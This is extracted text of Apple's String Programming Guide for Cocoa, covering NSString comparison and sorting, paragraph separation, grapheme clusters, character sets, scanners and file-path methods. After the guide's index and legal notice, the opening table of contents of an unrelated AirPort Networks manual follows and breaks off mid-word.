Filename9.txt < Filename20.txt < Filename100.txt. NSNumericSearch Search and comparison are currently performed as if the NSLiteralSearch option were specified. Examples Case-Insensitive Search for Prefix and Suffix NSString provides the methods hasPrefix: and hasSuffix: that you can use to find an exact match for a prefix or suffix. The following example illustrates how you can use rangeOfString:options: with a combination of options to perform case insensitive searches. NSString *searchString = @"age"; NSString *beginsTest = @"Agencies"; NSRange prefixRange = [beginsTest rangeOfString:searchString Searching, Comparing, and Sorting Strings Search and Comparison Options 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 24options:(NSAnchoredSearch | NSCaseInsensitiveSearch)]; // prefixRange = {0, 3} NSString *endsTest = @"BRICOLAGE"; NSRange suffixRange = [endsTest rangeOfString:searchString options:(NSAnchoredSearch | NSCaseInsensitiveSearch | NSBackwardsSearch)]; // suffixRange = {6, 3} Comparing Strings The following examples illustrate the use of various string comparison methods and associated options. The first shows the simplest comparison method. NSString *string1 = @"string1"; NSString *string2 = @"string2"; NSComparisonResult result; result = [string1 compare:string2]; // result = -1 (NSOrderedAscending) You can compare strings numerically using the NSNumericSearch option: NSString *string10 = @"string10"; NSString *string2 = @"string2"; NSComparisonResult result; result = [string10 compare:string2]; // result = -1 (NSOrderedAscending) result = [string10 compare:string2 options:NSNumericSearch]; // result = 1 (NSOrderedDescending) You can use convenience methods (caseInsensitiveCompare: and localizedCaseInsensitiveCompare:) to perform case-insensitive comparisons: Searching, Comparing, and Sorting Strings Examples 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 25NSString *string_a = @"Aardvark"; NSString *string_A = @"AARDVARK"; result = [string_a compare:string_A]; // result = 1 (NSOrderedDescending) result = [string_a caseInsensitiveCompare:string_A]; // result = 0 (NSOrderedSame) // equivalent to [string_a compare:string_A options:NSCaseInsensitiveSearch] Sorting strings like Finder To sort strings the way Finder does in OS X v10.6 and later, use the localizedStandardCompare: method. It should be used whenever file names or other strings are presented in lists and tables where Finder-like sorting is appropriate. The exact behavior of this method is different under different localizations, so clients should not depend on the exact sorting order of the strings. The following example shows another implementation of similar functionality, comparing strings to order them in the same way as they’re presented in Finder, and it also shows how to sort the array of strings. First, define a sorting function that includes the relevant comparison options (for efficiency, pass the user's locale as the context—this way it's only looked up once). int finderSortWithLocale(id string1, id string2, void *locale) { static NSStringCompareOptions comparisonOptions = NSCaseInsensitiveSearch | NSNumericSearch | NSWidthInsensitiveSearch | NSForcedOrderingSearch; NSRange string1Range = NSMakeRange(0, [string1 length]); return [string1 compare:string2 options:comparisonOptions range:string1Range locale:(NSLocale *)locale]; } Searching, Comparing, and Sorting Strings Examples 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 26You pass the function as a parameter to sortedArrayUsingFunction:context: with the user’s current locale as the context: NSArray *stringsArray = @[@"string 1", @"String 21", @"string 12", @"String 11", @"String 02"]; NSArray *sortedArray = [stringsArray sortedArrayUsingFunction:finderSortWithLocale context:[NSLocale currentLocale]]; // sortedArray contains { "string 1", "String 02", "String 11", "string 12", "String 21" } Searching, Comparing, and Sorting Strings Examples 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 27This article describes how line and paragraph separators are defined and how you can separate a string by paragraph. Line and Paragraph Separator Characters There are a number of ways in which a line or paragraph break may be represented. Historically \n, \r, and \r\n have been used. Unicode defines an unambiguous paragraph separator, U+2029 (for which Cocoa provides the constant NSParagraphSeparatorCharacter), and an unambiguous line separator, U+2028 (for which Cocoa provides the constant NSLineSeparatorCharacter). In the Cocoa text system, the NSParagraphSeparatorCharacter is treated consistently as a paragraph break, and NSLineSeparatorCharacter is treated consistently as a line break that is not a paragraph break—that is, a line break within a paragraph. However, in other contexts, there are few guarantees as to how these characters will be treated. POSIX-level software, for example, often recognizes only \n as a break. Some older Macintosh software recognizes only \r, and some Windows software recognizes only \r\n. Often there is no distinction between line and paragraph breaks. Which line or paragraph break character you should use depends on how your data may be used and on what platforms. The Cocoa text system recognizes \n, \r, or \r\n all as paragraph breaks—equivalent to NSParagraphSeparatorCharacter.When it inserts paragraph breaks, for example with insertNewline:, it uses \n. Ordinarily NSLineSeparatorCharacter is used only for breaks that are specifically line breaks and not paragraph breaks, for example in insertLineBreak:, or for representing HTML
elements. If your breaks are specifically intended as line breaks and not paragraph breaks, then you should typically use NSLineSeparatorCharacter. Otherwise, you may use \n, \r, or \r\n depending on what other software is likely to process your text. The default choice for Cocoa is usually \n. Separating a String “by Paragraph” A common approach to separating a string “by paragraph” is simply to use: NSArray *arr = [myString componentsSeparatedByString:@"\n"]; 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 28 Paragraphs and Line BreaksThis, however, ignores the fact that there are a number of other ways in which a paragraph or line break may be represented in a string—\r, \r\n, or Unicode separators. Instead you can use methods—such as lineRangeForRange: or getParagraphStart:end:contentsEnd:forRange:—that take into account the variety of possible line terminations, as illustrated in the following example. NSString *string = /* assume this exists */; unsigned length = [string length]; unsigned paraStart = 0, paraEnd = 0, contentsEnd = 0; NSMutableArray *array = [NSMutableArray array]; NSRange currentRange; while (paraEnd < length) { [string getParagraphStart:¶Start end:¶End contentsEnd:&contentsEnd forRange:NSMakeRange(paraEnd, 0)]; currentRange = NSMakeRange(paraStart, contentsEnd - paraStart); [array addObject:[string substringWithRange:currentRange]]; } Paragraphs and Line Breaks Separating a String “by Paragraph” 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 29It's common to think of a string as a sequence of characters, but when working with NSString objects, or with Unicode strings in general, in most cases it is better to deal with substrings rather than with individual characters. The reason for this is that what the user perceives as a character in text may in many cases be represented by multiple characters in the string. NSString has a large inventory of methods for properly handling Unicode strings, which in general make Unicode compliance easy, but there are a few precautions you should observe. NSString objects are conceptually UTF-16 with platform endianness. That doesn't necessarily imply anything about their internalstorage mechanism; what it meansisthat NSString lengths, character indexes, and ranges are expressed in terms of UTF-16 units, and that the term “character” in NSString method names refers to 16-bit platform-endian UTF-16 units. This is a common convention for string objects. In most cases, clients don't need to be overly concerned with this; aslong as you are dealing with substrings, the precise interpretation of the range indexes is not necessarily significant. The vast majority of Unicode code points used for writing living languages are represented by single UTF-16 units. However, some less common Unicode code points are represented in UTF-16 by surrogate pairs. A surrogate pair is a sequence of two UTF-16 units, taken from specific reserved ranges, that together represent a single Unicode code point. CFString has functions for converting between surrogate pairs and the UTF-32 representation of the corresponding Unicode code point. When dealing with NSString objects, one constraint is that substring boundaries usually should not separate the two halves of a surrogate pair. This is generally automatic for rangesreturned from most Cocoa methods, but if you are constructing substring ranges yourself you should keep this in mind. However, this is not the only constraint you should consider. In many writing systems, a single character may be composed of a base letter plus an accent or other decoration. The number of possible letters and accents precludes Unicode from representing each combination as a single code point, so in general such combinations are represented by a base character followed by one or more combining marks. For compatibility reasons, Unicode does have single code points for a number of the most common combinations; these are referred to as precomposed forms, and Unicode normalization transformations can be used to convert between precomposed and decomposed representations. However, even if a string is fully precomposed, there are still many combinations that must be represented using a base character and combining marks. For most text processing, substring ranges should be arranged so that their boundaries do not separate a base character from its associated combining marks. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 30 Characters and Grapheme ClustersIn addition, there are writing systems in which characters represent a combination of parts that are more complicated than accent marks. In Korean, for example, a single Hangul syllable can be composed of two or three subparts known as jamo. In the Indic and Indic-influenced writing systems common throughout South and Southeast Asia, single written characters often represent combinations of consonants, vowels, and marks such as viramas, and the Unicode representations of these writing systems often use code points for these individual parts,so that a single character may be composed of multiple code points. For most text processing, substring ranges should also be arranged so that their boundaries do not separate the jamo in a single Hangul syllable, or the components of an Indic consonant cluster. In general, these combinations—surrogate pairs, base characters plus combining marks, Hangul jamo, and Indic consonant clusters—are referred to as grapheme clusters. In order to take them into account, you can use NSString’s rangeOfComposedCharacterSequencesForRange: or rangeOfComposedCharacterSequenceAtIndex: methods, or CFStringGetRangeOfComposedCharactersAtIndex. These can be used to adjuststring indexes orsubstring ranges so that they fall on grapheme cluster boundaries, taking into account all of the constraints mentioned above. These methods should be the default choice for programmatically determining the boundaries of user-perceived characters.: In some cases, Unicode algorithms deal with multiple charactersin waysthat go beyond even grapheme cluster boundaries. Unicode casing algorithms may convert a single character into multiple characters when going from lowercase to uppercase; for example, the standard uppercase equivalent of the German character “ß” is the two-letter sequence “SS”. Localized collation algorithms in many languages consider multiple-character sequences as single units; for example, the sequence “ch” is treated as a single letter for sorting purposes in some European languages. In order to deal properly with cases like these, it is important to use standard NSString methods for such operations as casing, sorting, and searching, and to use them on the entire string to which they are to apply. Use NSString methods such as lowercaseString, uppercaseString, capitalizedString, compare: and its variants, rangeOfString: and its variants, and rangeOfCharacterFromSet: and its variants, or their CFString equivalents. These all take into account the complexities of Unicode string processing, and the searching and sorting methods in particular have many options to control the types of equivalences they are to recognize. In some less common cases, it may be necessary to tailor the definition of grapheme clusters to a particular need. The issues involved in determining and tailoring grapheme cluster boundaries are covered in detail in Unicode Standard Annex #29, which gives a number of examples and some algorithms. The Unicode standard in general is the best source for information about Unicode algorithms and the considerations involved in processing Unicode strings. If you are interested in grapheme cluster boundaries from the point of view of cursor movement and insertion point positioning, and you are using the Cocoa text system, you should know that on OS X v10.5 and later, NSLayoutManager has API support for determining insertion point positions within a line of text as it is laid Characters and Grapheme Clusters 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 31out. Note that insertion point boundaries are not identical to glyph boundaries; a ligature glyph in some cases, such as an “fi” ligature in Latin script, may require an internal insertion point on a user-perceived character boundary. See Cocoa Text Architecture Guide for more information. Characters and Grapheme Clusters 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 32An NSCharacterSet object represents a set of Unicode characters. NSString and NSScanner objects use NSCharacterSet objects to group characters together for searching operations, so that they can find any of a particular set of characters during a search. Character Set Basics A character set object represents a set of Unicode characters. Character sets are represented by instances of a class cluster. The cluster’s two public classes, NSCharacterSet and NSMutableCharacterSet, declare the programmatic interface for immutable and mutable character sets, respectively. An immutable character set is defined when it is created and subsequently cannot be changed. A mutable character set can be changed after it’s created. A character set object doesn’t perform any tasks; it simply holds a set of character values to limit operations on strings. The NSString and NSScanner classes define methods that take NSCharacterSet objects as argumentsto find any ofseveral characters. For example, this code excerpt findsthe range of the first uppercase letter in myString:. NSString *myString = @"some text in an NSString..."; NSCharacterSet *characterSet = [NSCharacterSet uppercaseLetterCharacterSet]; NSRange letterRange = [myString rangeOfCharacterFromSet:characterSet]; After this fragment executes, letterRange.location is equal to the index of the first “N” in “NSString” after rangeOfCharacterFromSet: isinvoked. If the first letter of the string were “S”, then letterRange.location would be 0. Creating Character Sets NSCharacterSet defines class methodsthat return commonly used charactersets,such asletters(uppercase or lowercase), decimal digits, whitespace, and so on. These “standard” character sets are always immutable, even if created by sending a message to NSMutableCharacterSet. See “Standard Character Sets and Unicode Definitions” (page 35) for more information on standard character sets. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 33 Character SetsYou can use a standard character set as a starting point for building a custom set by making a mutable copy of it and changing that. (You can also start from scratch by creating a mutable character set with alloc and init and adding characters to it.) For example, this fragment creates a character set containing letters, digits, and basic punctuation: NSMutableCharacterSet *workingSet = [[NSCharacterSet alphanumericCharacterSet] mutableCopy]; [workingSet addCharactersInString:@";:,."]; NSCharacterSet *finalCharacterSet = [workingSet copy]; To define a custom character set using Unicode code points, use code similar to the following fragment (which creates a character set including the form feed and line separator characters): UniChar chars[] = {0x000C, 0x2028}; NSString *string = [[NSString alloc] initWithCharacters:chars length:sizeof(chars) / sizeof(UniChar)]; NSCharacterSet *characterSet = [NSCharacterSet characterSetWithCharactersInString:string]; Performance considerations Because character sets often participate in performance-critical code, you should be aware of the aspects of their use that can affect the performance of your application. Mutable character sets are generally much more expensive than immutable character sets. They consume more memory and are costly to invert (an operation often performed in scanning a string). Because of this, you should follow these guidelines: ● Create as few mutable character sets as possible. ● Cache character sets (in a global dictionary, perhaps) instead of continually recreating them. ● When creating a custom set that doesn’t need to change after creation, make an immutable copy of the final character set for actual use, and dispose of the working mutable character set. Alternatively, create a character set file as described in “Creating a character set file” (page 35) and store it in your application’s main bundle. ● Similarly, avoid archiving characterset objects;store them in characterset filesinstead. Archiving can result in a character set being duplicated in different archive files, resulting in wasted disk space and duplicates in memory for each separate archive read. Character Sets Performance considerations 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 34Creating a character set file If your application frequently uses a custom character set, you should save its definition in a resource file and load that instead of explicitly adding individual characters each time you need to create the set. You can save a character set by getting its bitmap representation (an NSData object) and saving that object to a file: NSData *charSetRep = [finalCharacterSet bitmapRepresentation]; NSURL *dataURL = <#URL for character set#>; NSError *error; BOOL result = [charSetRep writeToURL:dataURL options:NSDataWritingAtomic error:&error]; By convention, characterset filenames use the extension .bitmap. If you intend for othersto use your character set files, you should follow this convention. To read a character set file with a .bitmap extension, simply use the characterSetWithContentsOfFile: method. Standard Character Sets and Unicode Definitions The standard character sets, such as that returned by letterCharacterSet, are formally defined in terms of the normative and informative categories established by the Unicode standard, such as Uppercase Letter, Combining Mark, and so on. The formal definition of a standard character set is in most cases given as one or more of the categories defined in the standard. For example, the set returned by lowercaseLetterCharacterSet include all characters in normative category Lowercase Letters, while the set returned by letterCharacterSet includes the characters in all of the Letter categories. Note that the definitions of the categoriesthemselves may change with new versions of the Unicode standard. You can download the files that define category membership from http://www.unicode.org/. Character Sets Creating a character set file 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 35An NSScanner object scans the characters of an NSString object, typically interpreting the characters and converting them into number and string values. You assign the scanner’s string on creation, and the scanner progresses through the characters of that string from beginning to end as you request items. Creating a Scanner NSScanner is a class cluster with a single public class, NSScanner. Generally, you instantiate a scanner object by invoking the class method scannerWithString: or localizedScannerWithString:. Either method returns a scanner object initialized with the string you pass to it. The newly created scanner starts at the beginning of its string. You scan components using the scan... methods such as scanInt:, scanDouble:, and scanString:intoString:. If you are scanning multiple lines, you typically create a while loop that continues until the scanner is at the end of the string, as illustrated in the following code fragment: float aFloat; NSScanner *theScanner = [NSScanner scannerWithString:aString]; while ([theScanner isAtEnd] == NO) { [theScanner scanFloat:&aFloat]; // implementation continues... } You can configure a scanner to consider or ignore case using the setCaseSensitive: method. By default a scanner ignores case. Using a Scanner Scan operationsstart at the scan location and advance the scanner to just past the last character in the scanned value representation (if any). For example, after scanning an integer from the string “137 small cases of bananas”, a scanner’s location will be 3, indicating the space immediately after the number. Often you need to advance the scan location to skip characters in which you are not interested. You can change the implicit 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 36 Scannersscan location with the setScanLocation: method to skip ahead a certain number of characters (you can also use the method to rescan a portion of the string after an error). Typically, however, you either want to skip characters from a particular character set, scan past a specific string, or scan up to a specific string. You can configure a scanner to skip a set of characters with the setCharactersToBeSkipped: method. A scanner ignores characters to be skipped at the beginning of any scan operation. Once it finds a scannable character, however, it includes all characters matching the request. Scanners skip whitespace and newline characters by default. Note that case is always considered with regard to characters to be skipped. To skip all English vowels, for example, you must set the characters to be skipped to those in the string “AEIOUaeiou”. If you want to read content from the current location up to a particular string, you can use scanUpToString:intoString: (you can pass NULL as the second argument if you simply want to skip the intervening characters). For example, given the following string: 137 small cases of bananas you can find the type of container and number of containers using scanUpToString:intoString: asshown in the following example. NSString *bananas = @"137 small cases of bananas"; NSString *separatorString = @" of"; NSScanner *aScanner = [NSScanner scannerWithString:bananas]; NSInteger anInteger; [aScanner scanInteger:&anInteger]; NSString *container; [aScanner scanUpToString:separatorString intoString:&container]; It is important to note that the search string (separatorString) is " of". By default a scanner ignores whitespace, so the space character after the integer is ignored. Once the scanner begins to accumulate characters, however, all characters are added to the output string until the search string is reached. Thus if the search string is "of" (no space before), the first value of container is “small cases ” (includes the space following); if the search string is " of" (with a space before), the first value of container is “small cases” (no space following). Scanners Using a Scanner 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 37After scanning up to a given string, the scan location is the beginning of that string. If you want to scan past thatstring, you must therefore firstscan in the string you scanned up to. The following code fragment illustrates how to skip past the search string in the previous example and determine the type of product in the container. Note the use of substringFromIndex: to in effect scan up to the end of a string. [aScanner scanString:separatorString intoString:NULL]; NSString *product; product = [[aScanner string] substringFromIndex:[aScanner scanLocation]]; // could also use: // product = [bananas substringFromIndex:[aScanner scanLocation]]; Example Suppose you have a string containing lines such as: Product: Acme Potato Peeler; Cost: 0.98 73 Product: Chef Pierre Pasta Fork; Cost: 0.75 19 Product: Chef Pierre Colander; Cost: 1.27 2 The following example uses alternating scan operationsto extract the product names and costs(costs are read as a float forsimplicity’ssake),skipping the expected substrings“Product:” and “Cost:”, as well asthe semicolon. Note that because a scanner skips whitespace and newlines by default, the loop does no special processing for them (in particular there is no need to do additional whitespace processing to retrieve the final integer). NSString *string = @"Product: Acme Potato Peeler; Cost: 0.98 73\n\ Product: Chef Pierre Pasta Fork; Cost: 0.75 19\n\ Product: Chef Pierre Colander; Cost: 1.27 2\n"; NSCharacterSet *semicolonSet; NSScanner *theScanner; NSString *PRODUCT = @"Product:"; NSString *COST = @"Cost:"; NSString *productName; float productCost; Scanners Example 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 38NSInteger productSold; semicolonSet = [NSCharacterSet characterSetWithCharactersInString:@";"]; theScanner = [NSScanner scannerWithString:string]; while ([theScanner isAtEnd] == NO) { if ([theScanner scanString:PRODUCT intoString:NULL] && [theScanner scanUpToCharactersFromSet:semicolonSet intoString:&productName] && [theScanner scanString:@";" intoString:NULL] && [theScanner scanString:COST intoString:NULL] && [theScanner scanFloat:&productCost] && [theScanner scanInteger:&productSold]) { NSLog(@"Sales of %@: $%1.2f", productName, productCost * productSold); } } Localization A scanner bases some of its scanning behavior on a locale, which specifies a language and conventions for value representations. NSScanner uses only the locale’s definition for the decimal separator (given by the key named NSDecimalSeparator). You can create a scanner with the user’s locale by using localizedScannerWithString:, or set the locale explicitly using setLocale:. If you use a method that doesn’t specify a locale, the scanner assumes the default locale values. Scanners Localization 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 39NSString provides a rich set of methodsfor manipulating strings asfile-system paths. You can extract a path’s directory, filename, and extension, expand a tilde expression (such as “~me”) or create one for the user’s home directory, and clean up paths containing symbolic links, redundant slashes, and references to “.” (current directory) and “..” (parent directory). Note: Where possible, you should use instances of NSURL to represent paths—the operating system deals with URLs more efficiently than with string representations of paths. Representing a Path NSString represents paths generically with ‘/’ asthe path separator and ‘.’ asthe extension separator. Methods that accept strings as path arguments convert these generic representations to the proper system-specific form as needed. On systems with an implicit root directory, absolute paths begin with a path separator or with a tilde expression (“~/...” or “~user/...”). Where a device must be specified, you can do that yourself—introducing a system dependency—or allow the string object to add a default device. You can create a standardized representation of a path using stringByStandardizingPath. This performs a number of tasks including: ● Expansion of an initial tilde expression; ● Reduction of empty components and references to the current directory (“//” and “/./”) to single path separators; ● In absolute paths, resolution of references to the parent directory (“..”) to the real parent directory; for example: NSString *path = @"/usr/bin/./grep"; NSString *standardizedPath = [path stringByStandardizingPath]; // standardizedPath: /usr/bin/grep path = @"~me"; 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 40 String Representations of File PathsstandardizedPath = [path stringByStandardizingPath]; // standardizedPath (assuming conventional naming scheme): /Users/Me path = @"/usr/include/objc/.."; standardizedPath = [path stringByStandardizingPath]; // standardizedPath: /usr/include path = @"/private/usr/include"; standardizedPath = [path stringByStandardizingPath]; // standardizedPath: /usr/include User Directories The following examples illustrate how you can use NSString’s path utilities and other Cocoa functions to get the user directories. // Assuming that users’ home directories are stored in /Users NSString *meHome = [@"~me" stringByExpandingTildeInPath]; // meHome = @"/Users/me" NSString *mePublic = [@"~me/Public" stringByExpandingTildeInPath]; // mePublic = @"/Users/me/Public" You can find the home directory for the current user and for a given user with NSHomeDirectory and NSHomeDirectoryForUser respectively: NSString *currentUserHomeDirectory = NSHomeDirectory(); NSString *meHomeDirectory = NSHomeDirectoryForUser(@"me"); Note that you should typically use the function NSSearchPathForDirectoriesInDomains to locate standard directories for the current user. For example, instead of: NSString *documentsDirectory = [NSHomeDirectory() stringByAppendingPathComponent:@"Documents"]; String Representations of File Paths User Directories 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 41you should use: NSString *documentsDirectory; NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES); if ([paths count] > 0) { documentsDirectory = [paths objectAtIndex:0]; } Path Components NSString provides a rich set of methods for manipulating strings as file-system paths, for example: Interprets the receiver as a path and returns the receiver’s extension, if any. pathExtension Returns a new string made by deleting the extension (if any, and only the last) from the receiver. stringByDeletingPathExtension Returns a new string made by deleting the last path component from the receiver, along with any final path separator. stringByDeletingLastPathComponent Using these and related methods described in NSString Class Reference , you can extract a path’s directory, filename, and extension, as illustrated by the following examples. NSString *documentPath = @"~me/Public/Demo/readme.txt"; NSString *documentDirectory = [documentPath stringByDeletingLastPathComponent]; // documentDirectory = @"~me/Public/Demo" NSString *documentFilename = [documentPath lastPathComponent]; // documentFilename = @"readme.txt" NSString *documentExtension = [documentPath pathExtension]; // documentExtension = @"txt" String Representations of File Paths Path Components 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 42File Name Completion You can find possible expansions of file names using completePathIntoString:caseSensitive:matchesIntoArray:filterTypes:. For example, given a directory ~/Demo that contains the following files: ReadMe.txt readme.html readme.rtf recondite.txt test.txt you can find all possible completions for the path ~/Demo/r as follows: NSString *partialPath = @"~/Demo/r"; NSString *longestCompletion; NSArray *outputArray; unsigned allMatches = [partialPath completePathIntoString:&longestCompletion caseSensitive:NO matchesIntoArray:&outputArray filterTypes:NULL]; // allMatches = 3 // longestCompletion = @"~/Demo/re" // outputArray = (@"~/Demo/readme.html", "~/Demo/readme.rtf", "~/Demo/recondite.txt") You can find possible completions for the path ~/Demo/r that have an extension “.txt” or “.rtf” as follows: NSArray *filterTypes = @[@"txt", @"rtf"]; unsigned textMatches = [partialPath completePathIntoString:&outputName caseSensitive:NO matchesIntoArray:&outputArray filterTypes:filterTypes]; // allMatches = 2 // longestCompletion = @"~/Demo/re" // outputArray = (@"~/Demo/readme.rtf", @"~/Demo/recondite.txt") String Representations of File Paths File Name Completion 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 43You can draw string objects directly in a focused NSView using methods such as drawAtPoint:withAttributes: (to draw a string with multiple attributes, such as multiple text fonts, you must use an NSAttributedString object). These methods are described briefly in “Text” in Cocoa Drawing Guide . The simple methods, however, are designed for drawing small amounts of text or text that is only drawn rarely—they create and dispose of various supporting objects every time you call them. To draw strings repeatedly, it is more efficient to use NSLayoutManager, as described in “Drawing Strings”. For an overview of the Cocoa text system, of which NSLayoutManager is a part, see Cocoa Text Architecture Guide . 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 44 Drawing StringsThis table describes the changes to String Programming Guide . Date Notes 2012-07-17 Updated code snippets to adopt new Objective-C features. Corrected string constant character set to UTF-8. Added guidance about using localizedStandardCompare: for Finder-like sorting. Added caveat to avoid using %s with RTL languages. Revised "String Format Specifiers" article. 2012-06-11 2009-10-15 Added links to Cocoa Core Competencies. Added new aricle on character clusters; updated list of string format specifiers. 2008-10-15 2007-10-18 Corrected minor typographical errors. Added notes regarding NSInteger and NSUInteger to "String Format Specifiers". 2007-07-10 2007-03-06 Corrected minor typographical errors. 2007-02-08 Corrected sentence fragments and improved the example in "Scanners." 2006-12-05 Added code samples to illustrate searching and path manipulation. 2006-11-07 Made minor revisions to "Scanners" article. 2006-10-03 Added links to path manipulation methods. 2006-06-28 Corrected typographical errors. Added a new article, "Reading Strings From and Writing Strings To Files and URLs"; significantly updated "Creating and Converting Strings." 2006-05-23 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 45 Document Revision HistoryDate Notes Included “Creating a Character Set” into “Character Sets” (page 33). Changed title from "Strings" to conform to reference consistency guidelines. 2006-01-10 Added “Formatting String Objects” (page 13) article. Added Data Formatting and the Core Foundation Strings programming topics to the introduction. 2004-06-28 Added information about custom Unicode character sets and retrieved missing code fragments in “Creating a Character Set”. Added information and cross-reference to “Drawing Strings” (page 44). Rewrote introduction and added an index. 2004-02-06 Added NSNumericSearch description to “Searching, Comparing, and Sorting Strings” (page 22). 2003-09-09 2003-03-17 Reinstated the sample code that was missing from “Scanners” (page 36). Updated “Creating and Converting String Objects” (page 8) to recommend the use of UTF8 encoding, and noted the pending deprecation of the cString... methods. 2003-01-17 2002-11-12 Revision history was added to existing topic. Document Revision History 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 46A alloc method 34 archiving character set objects 34 ASCII character encoding converting string object contents 8 availableStringEncodings method 8 C C strings Cocoa string objects and 7 creating and converting 11 character encodings string manipulation and 8 character sets custom 34 example code 34 guidelines for use 34 mutable and immutable 33 saving to a file 35 standard 33, 35 characterAtIndex: method 7 characterSetWithContentsOfFile: method 35 compare: method 22 compare:options: method 22, 24 compare:options:range: method 22 comparing strings 22–23 comparison methods for strings 22 componentsSeparatedByString: method 11 current directories resolving references to 40 D dataUsingEncoding: method 11, 12 defaultCStringEncoding method 8 description method 13 descriptionWithLocale: method 13 directories manipulating strings as paths 40, 42 E encodings, character string manipulation and 8 EUC character encoding 8 F file-system paths and strings 42 format strings 13 G getCharacters:length: method 12 I init method for mutable character sets 34 initWithData:encoding: method 8, 11, 12 initWithFormat: method 10 initWithFormat:locale: method 12 ISO Latin 1 character encoding 8 L length method 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 47 Indexfor string objects 7 letterCharacterSet method 35 localization scanning strings and 39 value formatting and 13 localizedScannerWithString: method 36, 39 localizedStringWithFormat: method 9, 12 lowercaseLetterCharacterSet method 35 M myString: method 33 N NSCharacterSet class 33 NSLayoutManager class 44 NSMutableCharacterSet class 33 NSMutableString class 7, 8 NSScanner class 23, 36–38 NSString class creating string objects from 8 described 7 methods for representing file-system paths 40 scanners and 36 NSView class 44 P parent directories resolving references to 40 paths and strings 42 primitive methods of NSString 7 printf function NSString and 13 R rangeOfCharacterFromSet: method 22, 33 rangeOfCharacterFromSet:options: method 22 rangeOfCharacterFromSet:options:range: method 22 rangeOfComposedCharacterSequenceAtIndex: method 23 rangeOfString: method 22 rangeOfString:options: method 22 rangeOfString:options:range: method 22 S scan... methods 36 scanners 36, 38 instantiating 36 operation of 36 sample code 38 scannerWithString: method 36 scanUpToString:intoString: method 37 search methods for strings 22 setCaseSensitive: method 36 setCharactersToBeSkipped: method 37 setLocale: method 39 setScanLocation: method 37 Shift-JIS character encoding 8 standard character sets 33, 35 string objects combining and extracting 10 comparison methods 22 creating and converting 8–12 described 7 drawing 44 searching and comparing 22–23 stringByAppendingFormat: method 10, 12 stringByAppendingString: method 10, 12 stringWithCharacters:length: method 12 stringWithContentsOfFile: method 21 stringWithFormat: method 10 stringWithUTF8String: method 12 substringFromIndex: method 11 substringToIndex: method 11 Index 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 48substringWithRange: method 11 U Unicode characters in string objects 8 code points used to define character sets 34 in string objects 7 NSCharacterSet and 33 standard character sets 35 string comparison standard 22 UTF8 character encoding 11 UTF8String method 11, 12 V value formatting string conversion and 13 W writeToFile:atomically: method 21 Index 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 49Apple Inc. © 1997, 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrievalsystem, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, Cocoa, Finder, Mac, Macintosh, Objective-C, OS X, and Safari are trademarks of Apple Inc., registered in the U.S. and other countries. Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.ASARESULT, THISDOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL,OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages. THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. Apple AirPort Networks2 1 Contents Chapter 1 3 Getting Started 5 Configuring an Apple Wireless Device for Internet Access Using AirPort Utility 6 Extending the Range of Your AirPort Network 6 Sharing a USB Hard Disk Connected to an AirPort Extreme Base Station or Time Capsule 6 Printing with an Apple Wireless Device 6 Sharing Your Computer’s Internet Connection Chapter 2 9 AirPort Security 9 Security for AirPort Networks at Home 10 Security for AirPort Networks in Businesses and Classrooms 11 Wi-Fi Protected Access (WPA) and WPA2 Chapter 3 14 AirPort Network Designs 15 Using AirPort Utility 17 Setting Up the AirPort Extreme Network 24 Configuring and Sharing Internet Access 41 Setting 